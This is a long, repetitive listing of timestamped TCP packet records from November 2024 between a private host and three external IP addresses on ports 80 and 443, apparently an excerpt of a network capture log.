                                                                                                                                                                      Nov 26, 2024 09:33:18.158206940 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.161506891 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.161660910 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.161912918 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.165030003 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.165149927 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.165205002 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.168396950 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.168514013 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.168557882 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.171847105 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.171955109 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.172149897 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.175260067 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.175355911 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.175410032 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.178796053 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.178863049 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.178996086 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.182024002 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.182147026 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.182373047 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.185559034 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.185628891 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.185674906 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.188868999 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.188946009 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.188993931 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.192271948 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.192365885 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.192433119 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.195657015 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.195780993 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.195836067 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.199063063 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.199232101 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.199307919 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.202454090 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.202579021 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.202626944 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.205877066 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.205990076 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.206031084 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.209317923 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.209441900 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.209557056 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.212879896 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.212894917 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.212979078 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.216099024 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.216214895 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.216260910 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.219566107 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.219666004 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.219913006 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.222939014 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.223041058 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.223112106 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.226360083 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.226455927 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.226661921 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.229774952 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.229895115 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.229937077 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.233194113 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.233309984 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.233386993 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.236592054 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.236691952 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.236740112 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.240005016 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.240097046 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.240431070 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.243407011 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.243500948 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.243561983 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.246876955 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.246954918 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.247013092 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.250238895 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.250298977 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.250602961 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.338778019 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.338859081 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.338939905 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.340049028 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.340151072 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.340209007 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.342705011 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.342825890 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.342879057 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.345382929 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.345501900 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.345571995 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.348028898 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.348046064 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.348098040 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.350471020 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.350594044 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.351140022 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.353008032 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.353053093 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.353132010 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.355479956 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.355600119 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.355757952 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.357922077 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.357959986 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.358211040 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.360423088 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.360528946 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.360580921 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.362896919 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.362968922 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.363029003 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.365077972 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.365200996 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.365257978 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.367419004 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.367615938 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.367657900 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.369796038 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.369946003 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.370161057 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.380804062 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.380856037 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.380873919 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.380886078 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.380898952 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.380911112 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.380945921 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.380976915 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.380985975 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.380996943 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.381037951 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.381041050 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.381119013 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.381236076 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.383661032 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.383848906 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.383903027 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.385551929 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.385725975 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.387279987 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.387773991 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.387876987 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.389389038 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.389991999 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.390053988 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.390125036 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.392426014 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.392447948 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.392534971 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.394552946 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.394622087 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.394674063 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.396716118 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.396836042 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.396883011 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.398979902 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.399120092 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.399308920 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.401330948 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.401376963 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.401454926 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.403537989 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.403693914 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.403749943 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.405818939 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.405942917 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.406086922 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.407952070 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.408133030 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.408214092 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.410240889 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.410326004 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.410373926 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.412468910 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.412549973 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.412595987 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.414696932 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.414742947 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.414813042 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.417273998 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.417443037 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.417496920 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.419338942 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.419471979 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.419524908 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.421426058 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.421572924 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.421627998 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.423711061 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.423832893 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.423882008 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.425952911 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.426099062 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.426148891 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.428232908 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.428252935 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.428297997 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.430504084 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.430577993 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.430632114 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.432629108 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.487834930 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.667723894 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:19.370095968 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:19.490170002 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:19.490267038 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:19.490770102 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:19.613598108 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:20.764657021 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:20.783932924 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:20.903964996 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:21.189790010 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:21.237828016 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:21.735521078 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:21.735568047 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:21.735640049 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:21.753828049 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:21.753848076 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.062887907 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.062982082 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.069006920 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.069020033 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.069305897 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.115520000 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.126260996 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.167341948 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.523736954 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.523818016 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.523885012 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.532444000 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.551218033 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:23.671524048 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.961576939 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.963968992 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.964030027 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.964090109 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.964421034 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.964436054 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:24.003462076 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:25.225162983 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:25.254821062 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:25.254858971 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:25.683938026 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:25.684010029 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:25.684858084 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:25.685224056 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:25.689826965 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:25.691135883 CET4971580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:25.810734034 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:25.810802937 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:25.811466932 CET8049715193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:25.811543941 CET4971580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:25.811736107 CET4971580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:25.935117960 CET8049715193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:27.177345991 CET8049715193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:27.178734064 CET49716443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:27.178780079 CET44349716172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:27.178898096 CET49716443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:27.179164886 CET49716443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:27.179182053 CET44349716172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:27.222224951 CET4971580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:28.391392946 CET44349716172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:28.393362999 CET49716443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:28.393379927 CET44349716172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:28.836034060 CET44349716172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:28.836116076 CET44349716172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:28.836196899 CET49716443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:28.838000059 CET49716443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:28.865952015 CET4971780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:28.986037970 CET8049717193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:28.986159086 CET4971780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:28.986321926 CET4971780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:29.106334925 CET8049717193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:30.308250904 CET8049717193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:30.309752941 CET49718443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:30.309798002 CET44349718172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:30.309871912 CET49718443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:30.310167074 CET49718443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:30.310184002 CET44349718172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:30.362915039 CET4971780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:31.528691053 CET44349718172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:31.530638933 CET49718443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:31.530663013 CET44349718172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:31.974095106 CET44349718172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:31.974174023 CET44349718172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:31.974308014 CET49718443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:31.974809885 CET49718443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:31.979316950 CET4971780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:31.980370998 CET4971980192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:32.099539042 CET8049717193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:32.099612951 CET4971780192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:32.100322962 CET8049719193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:32.100403070 CET4971980192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:32.100543976 CET4971980192.168.2.8193.122.6.168
